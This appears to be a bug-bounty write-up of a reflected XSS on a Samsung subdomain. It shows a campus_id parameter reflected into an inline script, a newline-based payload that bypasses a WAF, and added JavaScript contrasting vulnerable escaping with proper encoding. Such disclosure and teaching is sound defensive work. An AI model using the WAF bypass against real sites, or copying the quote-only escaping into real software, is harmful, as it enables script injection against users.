Reflected XSS on sgsg.samsung.com

Learn System Security - Reflected XSS on sgsg.samsung.com ~


As in my earlier write-ups, I started by enumerating subdomains with Sublist3r and checking the HTTP status code of every subdomain I found.

I also use Google dorks to find interesting URLs.
Eventually I tried this dork:
  • site:sgsg.samsung.com

Using the dork above, I found a URL whose page source reflects whatever value is passed in the campus_id parameter straight into an inline script block.
Request:
Response:
  • <script type="text/javascript">
     //<![CDATA[
     var timer;
     var campus_id = "Oxford";
     ...

I tried a simple injection first: a double quote, to see whether it would break out of the string.
Request:
Response:
  • <script type="text/javascript">
     //<![CDATA[
     var timer;
     var campus_id = "Oxford\"";
     ...

The quote comes back backslash-escaped, so we can't break out of the string with quotes.
Next I tried a closing script tag.
Request:
Response:
  • <script type="text/javascript">
     //<![CDATA[
     var timer;
     var campus_id = "</script>";
     ...

Bam!! The server does not block this request, and the closing tag is reflected unencoded, so the injected value terminates the script block.
Next steps.
Request:
Response:
  • [blocked]
Wutt? When I use <svg/onload=alert`1`//>, the server blocks the request.
I tried other HTML tags for XSS and the server blocked every one of those requests too.
Then I thought: since </script> went through, maybe a script tag will too.

Request:
Response:
  • [blocked]

Again? Hmmm...
The server seems to block the request whenever it detects a script tag or similar.

Time to bypass it.

#Bypass 1
Request:
Response:
  • [blocked]

#Bypass 2
Request:
Response:
  • [blocked]

#Bypass 3
Request:
Response:
  • [blocked]

#Bypass 4
Request:
Response:
  • [blocked]

#Bypass 5
Request:
Response:
  • <script type="text/javascript">
     //<![CDATA[
     var timer;
     var campus_id = "</script><script/
     <k>alert`1`//
    ";
     ...

**Success**

With %0A, the URL encoding of a newline, between "script/" and the rest of the tag, we can bypass the WAF on Samsung: the filter no longer sees a script tag, but the browser's HTML tokenizer still parses "<script/" followed by a newline as the start of a script element.
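To make the root cause and the fix concrete, here is an added example (not code from this write-up or from Samsung) that models the reflection of campus_id into a JavaScript string and contrasts quote-only escaping with proper JS-string-context encoding. The WAF rule in it is a hypothetical stand-in for the filter the post ran into, and the payload constants are constructed from the responses shown above.

```javascript
// Constructed inputs: the payloads shown in the write-up.
const NEWLINE_PAYLOAD = "</script><script/\n<k>alert`1`//";
const SVG_PAYLOAD = "<svg/onload=alert`1`//>";

// Hypothetical blacklist WAF (a stand-in for the filter the post ran into,
// not Samsung's real rule): blocks a literal <script> tag and a few HTML
// vectors; returns true when the request would be blocked.
function naiveWafBlocks(value) {
  return /<script>|<svg|onload=/i.test(value);
}

// Vulnerable server behaviour as the responses in the post show it:
// only the double quote is backslash-escaped.
function quoteOnlyEscape(value) {
  return value.replace(/"/g, '\\"');
}

// Hardened: JSON-encode the value, then \u-escape every character that the
// HTML tokenizer or a JS line terminator could act on, so the reflected
// value can never close the surrounding <script> block.
function jsStringLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Build the inline script block the way the page embeds campus_id.
function renderScript(jsLiteral) {
  return '<script type="text/javascript">\n' +
         'var campus_id = ' + jsLiteral + ';\n' +
         '</script>';
}

function renderVulnerable(value) {
  return renderScript('"' + quoteOnlyEscape(value) + '"');
}

function renderHardened(value) {
  return renderScript(jsStringLiteral(value));
}

// The HTML tokenizer ends a script block at the first "</script" it sees,
// regardless of JavaScript quoting; more than one occurrence means the
// injected value closed the block early and opened a new tag context.
function countScriptEnds(html) {
  return (html.toLowerCase().match(/<\/script/g) || []).length;
}
```

The point for defenders: the blacklist passes the newline payload untouched, while contextual output encoding makes the same payload harmless without any filter at all.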

Screenshot:

#HappyHacking
